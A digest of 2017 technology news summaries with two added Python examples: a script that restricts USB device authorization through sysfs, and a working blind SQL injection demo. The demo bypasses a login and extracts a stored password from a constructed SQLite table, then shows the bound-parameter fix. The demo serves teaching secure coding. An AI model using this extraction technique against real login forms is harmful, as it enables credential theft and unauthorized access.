Linux Has a USB Driver Security Problem

Catalin Cimpanu, reporting for BleepingComputer: USB drivers included in the Linux kernel are rife with security flaws that in some cases can be exploited to run untrusted code and take over users’ computers. The vast majority of these vulnerabilities came to light on Monday, when Google security expert Andrey Konovalov informed the Linux community of 14 vulnerabilities he found in the Linux kernel USB subsystem. “All of them can be triggered with a crafted malicious USB device in case an attacker has physical access to the machine,” Konovalov said. The 14 flaws are actually part of a larger list of 79 flaws Konovalov found in Linux kernel USB drivers during the past months. Not all of these 79 vulnerabilities have been reported, let alone patched. Most are simple DoS (Denial of Service) bugs that freeze or restart the OS, but some allow attackers to elevate privileges and execute malicious code. Read more of this story at Slashdot.
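Every bug in that list needs a device to be plugged in and handed to a driver, so the check a Linux administrator would want here is whether the host binds drivers to new USB devices automatically. The script below is an added example, not code from the article, from Konovalov's work or from the kernel tree. It uses the sysfs attribute `authorized_default` that each USB host controller exposes under /sys/bus/usb/devices/usbN/: writing 0 leaves newly attached devices unauthorized (no driver bound) until an administrator writes 1 to that device's own `authorized` attribute. The `sysfs_root` parameter and the constructed fake tree in `demo()` are assumptions added so the logic can be exercised without root or real hardware; `--live` reads the real controllers.

```python
"""Audit and tighten USB device authorization on a Linux host (added example)."""
import glob
import os
import sys
import tempfile

SYSFS_USB = "/sys/bus/usb/devices"


def controllers(sysfs_root=SYSFS_USB):
    """Return the sysfs directories of USB host controllers (usb1, usb2, ...)."""
    return sorted(glob.glob(os.path.join(sysfs_root, "usb[0-9]*")))


def audit(sysfs_root=SYSFS_USB):
    """Map each controller name to its authorized_default value (None if unreadable)."""
    result = {}
    for ctl in controllers(sysfs_root):
        name = os.path.basename(ctl)
        try:
            with open(os.path.join(ctl, "authorized_default")) as f:
                result[name] = int(f.read().strip())
        except (OSError, ValueError):
            result[name] = None
    return result


def lock_down(sysfs_root=SYSFS_USB):
    """Set authorized_default=0 on every controller that still auto-authorizes.

    Returns the names of the controllers that were changed. Needs root on a
    live system; devices already bound when this runs are not affected.
    """
    changed = []
    for name, value in audit(sysfs_root).items():
        if value is not None and value != 0:
            with open(os.path.join(sysfs_root, name, "authorized_default"), "w") as f:
                f.write("0")
            changed.append(name)
    return changed


def authorize_device(device, sysfs_root=SYSFS_USB):
    """Authorize one already-attached device (e.g. '1-1') after inspecting it.

    Returns the value read back from the device's `authorized` attribute.
    """
    path = os.path.join(sysfs_root, device, "authorized")
    with open(path, "w") as f:
        f.write("1")
    with open(path) as f:
        return int(f.read().strip())


def demo():
    """Exercise audit/lock_down/authorize_device on a constructed fake sysfs tree."""
    root = tempfile.mkdtemp(prefix="fake-sysfs-")
    # Constructed sample: two controllers, one still auto-authorizing, plus one device.
    for ctl, value in (("usb1", "1"), ("usb2", "0")):
        os.makedirs(os.path.join(root, ctl))
        with open(os.path.join(root, ctl, "authorized_default"), "w") as f:
            f.write(value + "\n")
    os.makedirs(os.path.join(root, "1-1"))
    with open(os.path.join(root, "1-1", "authorized"), "w") as f:
        f.write("0\n")
    return {
        "before": audit(root),
        "changed": lock_down(root),
        "after": audit(root),
        "device": authorize_device("1-1", root),
    }


if __name__ == "__main__":
    if len(sys.argv) > 1 and sys.argv[1] == "--live":
        print("live controllers:", audit())   # read-only; call lock_down() to change
    else:
        print(demo())
```

Caveat: authorization gates configuration and driver binding, not enumeration, so the core still parses the device descriptor of whatever is plugged in; this narrows the reachable driver code, it does not make a malicious device harmless, and devices attached before the lock-down stay bound.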

Windows 10’s Version of AirDrop Lets You Quickly Share Files Between PCs

Microsoft is testing its “Near Share” feature of Windows 10 in the latest Insider build (17035) today, which will let Windows 10 PCs share documents or photos to PCs nearby via Bluetooth. The Verge reports: A new Near Share option will be available in the notification center, and the feature can be accessed through the main share function in Windows 10. Files will be shared wirelessly, and recipients will receive a notification when someone is trying to send a file. Microsoft’s addition comes just a day after Google unveiled its own AirDrop-like app for Android.

TorMoil Vulnerability Leaks Real IP Address From Tor Browser Users; Security Update Released

Catalin Cimpanu, reporting for BleepingComputer: The Tor Project has released a security update for the Tor Browser on Mac and Linux to fix a vulnerability that leaks users’ real IP addresses. The vulnerability was spotted by Filippo Cavallarin, CEO of We Are Segment, an Italian company specialized in cyber-security and ethical hacking. Cavallarin privately reported the issue — which he codenamed TorMoil — to the Tor Project last week. Tor Project developers worked with the Firefox team (Tor Browser is based on the Firefox browser) to release a fix. Today, the Tor team released version 7.0.9 to address the vulnerability. Tor Browser 7.0.9 is only available for Mac and Linux users. Tor Browser on Windows is not affected.

Another Million Subscribers Cut the Pay TV Cord Last Quarter

A report from FierceCable says that a million more U.S. pay TV subscribers cut the TV cord last quarter. “Only five of the seven biggest pay TV providers have released their third quarter subscriber data, but collectively these companies saw a net loss of 632,000 pay TV subscribers during the period (385,000 for AT&T and DirecTV, 125,000 for Comcast, 104,000 for Charter, 18,000 for Verizon FiOS TV),” reports DSLReports. “Dish has yet to report its own cord cutting tallies, but the company is again expected to be among the hardest hit due to a high level of retransmission fee feuds and a lack of broadband bundles.”

Android Oreo Bug Sends Thousands of Phones Into Infinite Boot Loops

An anonymous reader writes: A bug in the new “Adaptive Icons” feature introduced in Android Oreo has sent thousands of phones into infinite boot loops, forcing some users to reset their devices to factory settings, causing users to lose data along the way. The bug was discovered by Jcbsera, the developer of the Swipe for Facebook Android app (energy-efficient Facebook wrapper app), and does not affect Android Oreo (8.0) in its default state. The bug occurs only with apps that use adaptive icons — a new feature introduced in Android Oreo that allows icons to change shape and size based on the device they’re viewed on, or the type of launcher the user is using on his Android device. For example, adaptive icons will appear in square, rounded, or circle containers depending on the theme or launcher the user is using. The style of adaptive icons is defined in a local XML file. The bug first manifested itself when the developer of the Swipe for Facebook Android app accidentally renamed the foreground image of his adaptive icon with the same name as this XML file (ic_launcher_main.png and ic_launcher_main.xml). This naming scheme sends Android Oreo into an infinite loop that regularly crashes the device. At one point, Android detects something is wrong and prompts the user to reset the device to factory settings. Users don’t have to open an app; the crashes still happen just by having an app with malformed adaptive icon artifacts on your phone. Google said it will fix the issue in Android Oreo 8.1.

After 12 Years, Mozilla Kills ‘Firebug’ Dev Tool

An anonymous reader quotes InfoWorld: The Firebug web development tool, an open source add-on to the Firefox browser, is being discontinued after 12 years, replaced by Firefox Developer Tools. Firebug will be dropped with next month’s release of Firefox Quantum (version 57). The Firebug tool lets developers inspect, edit, and debug code in the Firefox browser as well as monitor CSS, HTML, and JavaScript in webpages. It still has more than a million people using it, said Jan Honza Odvarko, who has been the leader of the Firebug project. Many extensions were built for Firebug, which is itself an extension to Firefox… The goal is to make debugging native to Firefox. “Sometimes, it’s better to start from scratch, which is especially true for software development,” Odvarko said.

Samsung Made a Bitcoin Mining Rig Out of 40 Old Galaxy S5s

An anonymous reader quotes a report from Motherboard: Samsung is starting a new “Upcycling” initiative that is designed to turn old smartphones into something brand new. Behold, for example, this bitcoin mining rig, made out of 40 old Galaxy S5 devices, which runs on a new operating system Samsung has developed for its upcycling initiative. Samsung premiered this rig, and a bunch of other cool uses for old phones, at its recent developer’s conference in San Francisco. Upcycling involves repurposing old devices instead of breaking them down for parts or reselling them. The people at Samsung’s C-Lab — an engineering team dedicated to creative projects — showed off old Galaxy phones and assorted tablets stripped of Android software and repurposed into a variety of different objects. The team hooked 40 old Galaxy S5s together to make a bitcoin mining rig, repurposed an old Galaxy tablet into an Ubuntu-powered laptop, used a Galaxy S3 to monitor a fishtank, and programmed an old phone with facial recognition software to guard the entrance of a house in the form of an owl. Samsung declined to answer specific questions about the bitcoin mining rig, but an information sheet at the developer’s conference noted that eight Galaxy S5 devices can mine at a greater power efficiency than a standard desktop computer (not that too many people are mining bitcoin on their desktops these days).

Critical Flaws In Maritime Communications System Could Endanger Entire Ships

Orome1 shares a report from Help Net Security: IOActive security consultant Mario Ballano has discovered two critical cybersecurity vulnerabilities affecting Stratos Global’s AmosConnect communication shipboard platform. The platform works in conjunction with the ships’ satellite equipment, and integrates vessel and shore-based office applications, as well as provides services like Internet access for the crew, email, IM, position reporting, etc. The first vulnerability is a blind SQL injection in a login form. Attackers that successfully exploit it can retrieve credentials to log into the service and access sensitive information stored in it. The second one is a built-in backdoor account with full system privileges. “Among other things, this vulnerability allows attackers to execute commands with SYSTEM privileges on the remote system by abusing AmosConnect Task Manager,” Ballano shared. The found flaws can be exploited only by an attacker that has access to the ship’s IT systems network, he noted, but on some ships the various networks might not be segmented, or AmosConnect might be exposed to one or more of them. The vulnerabilities were found in AmosConnect 8.4.0, and Stratos Global was notified a year ago. But Inmarsat won’t fix them, and has discontinued the 8.0 version of the platform in June 2017.
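The first of the two flaws, a blind SQL injection in a login form that yields stored credentials, is worth seeing in working code. The following is an added example, not AmosConnect code, and IOActive published no exploit details here; the users table, the two login handlers and the sample accounts are constructed for the demonstration. It shows that a form which only answers accept or reject still lets an attacker read a stored password out of the database, one character per yes/no question, when the query is built by string concatenation, and that the same handler with bound parameters answers every such question with "no".

```python
"""Blind (boolean-based) SQL injection through a login form, beside the fix (added example)."""
import sqlite3
import string

# Characters tried per position; the quote and backslash are left out so the
# injected condition always stays a valid SQL string literal.
CHARSET = string.ascii_letters + string.digits + "!@#$%^&*()-_=+.,:;?"


def make_db():
    """In-memory database with constructed sample accounts (not real data)."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (username TEXT, password TEXT)")
    db.executemany("INSERT INTO users VALUES (?, ?)",
                   [("admin", "s3cr3t!"), ("crew", "anchor")])
    return db


def login_vulnerable(db, username, password):
    """Vulnerable handler: user input is pasted straight into the SQL text."""
    q = ("SELECT 1 FROM users WHERE username = '%s' AND password = '%s'"
         % (username, password))
    return db.execute(q).fetchone() is not None


def login_fixed(db, username, password):
    """Hardened handler: bound parameters, so input can never become SQL."""
    q = "SELECT 1 FROM users WHERE username = ? AND password = ?"
    return db.execute(q, (username, password)).fetchone() is not None


def ask(login, db, condition):
    """Turn the login form into a yes/no oracle for an arbitrary SQL condition.

    The injected username closes the string literal, ORs in the condition and
    comments out the password comparison, so the password field is irrelevant.
    """
    return login(db, "' OR (%s) --" % condition, "x")


def extract_password(login, db, target="admin", max_len=32):
    """Recover target's stored password using only accept/reject answers."""
    recovered = ""
    for pos in range(1, max_len + 1):
        for ch in CHARSET:
            cond = ("EXISTS(SELECT 1 FROM users WHERE username = '%s' "
                    "AND substr(password, %d, 1) = '%s')" % (target, pos, ch))
            if ask(login, db, cond):
                recovered += ch
                break
        else:
            break   # no character matched at this position: end of the password
    return recovered


if __name__ == "__main__":
    db = make_db()
    print("classic bypass:", login_vulnerable(db, "' OR 1=1 --", "x"))  # True
    print("recovered:", extract_password(login_vulnerable, db))          # s3cr3t!
    print("against fix:", repr(extract_password(login_fixed, db)))       # ''
```

The extraction needs at most len(CHARSET) requests per character and no error message or data in the response, which is why "the login page only says invalid" is not a mitigation; the bound-parameter handler is. The second flaw, the built-in privileged account, has no code-level fix on the operator's side, which is the reason the report's advice is network segmentation.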

Justice Department Demands Five Twitter Users’ Personal Info Over an Emoji

An anonymous reader quotes a report from Techdirt: Back in May, the Justice Department — apparently lacking anything better to do with its time — sent a subpoena to Twitter, demanding a whole bunch of information on five Twitter users, including a few names that regular Techdirt readers may be familiar with. If you can’t see that, it’s a subpoena asking for information on the following five Twitter users: @dawg8u (“Mike Honcho”), @abtnatural (“Virgil”), @Popehat (Ken White), @associatesmind (Keith Lee) and @PogoWasRight (Dissent Doe). I’m pretty sure we’ve talked about three of those five in previous Techdirt posts. Either way, they’re folks who are quite active in legal/privacy issues on Twitter. And what info does the DOJ want on them? Well, basically everything: [users’ names, addresses, IP addresses associated with their time on Twitter, phone numbers and credit card or bank account numbers.] That’s a fair bit of information. Why the hell would the DOJ want all that? Would you believe it appears to be over a single tweet from someone to each of those five individuals that consists entirely of a smiley face? I wish I was kidding. Here’s the tweet and then I’ll get into the somewhat convoluted back story. The tweet is up as I write this, but here’s a screenshot in case it disappears. The Department of Justice’s subpoena is intended to address allegations that Shafer, who has a history of spotting weak encryption and drawing attention to it, cyberstalked an FBI agent after the agency raided his home. Vanity Fair summarizes the incident: “In 2013, Shafer discovered that FairCom’s data-encryption package had actually exposed a dentist’s office to data theft. An F.T.C. settlement later validated Shafer’s reporting, but in 2016, when another dentist’s office responded to Shafer’s disclosure by claiming he’d violated the Computer Fraud and Abuse Act and broken the law, the F.B.I. raided his home and confiscated many of his electronics. Shafer was particularly annoyed at F.B.I. Special Agent Nathan Hopp, who helped to conduct the raid, and who was later involved in a different case: in March, he compiled a criminal complaint involving the F.B.I.’s arrest of a troll for tweeting a flashing GIF at journalist Kurt Eichenwald, who is epileptic. Shafer began to compile publicly available information about Hopp, sharing his findings on Twitter. The Twitter users named in the subpoena had started a separate discussion about Hopp, with one user calling Hopp the “least busy F.B.I. agent of all time,” a claim that prompted Shafer’s smiley-faced tweet.”

WeWork Employees Caught Spying on Competition

An anonymous reader shares a report: The battle in the red-hot co-working space business is heating up. WeWork, the No. 1 player in the sector, allegedly sent two spies to infiltrate rival Knotel — to steal info and some customers, Knotel claimed. The spies showed up at seven Knotel properties in Manhattan last month in a “systematic attempt to pilfer Knotel’s proprietary information and trade secrets,” according to a cease-and-desist letter the smaller company sent to WeWork. The Post has obtained a copy of the letter. The corporate espionage rookies may have pulled off the caper except, in a totally random happening, a Knotel employee recognized one of them as a friend of a friend, according to sources close to Knotel. While the pair used fake names to gain entry, according to the letter, a call to the Knotel worker’s pal got the spy’s real name — and a couple of social media inquiries turned up the fact that he worked for rival WeWork, sources said. The letter to WeWork asks for a reply by Oct. 13 — but so far Knotel hasn’t heard a peep from its rival, according to CEO Amol Sarva. While inside the Knotel offices, visited Sept. 12-14, the luckless spies posed “as the founders of a fast-growing startup” and said they needed space for their six-person company, according to the letter.
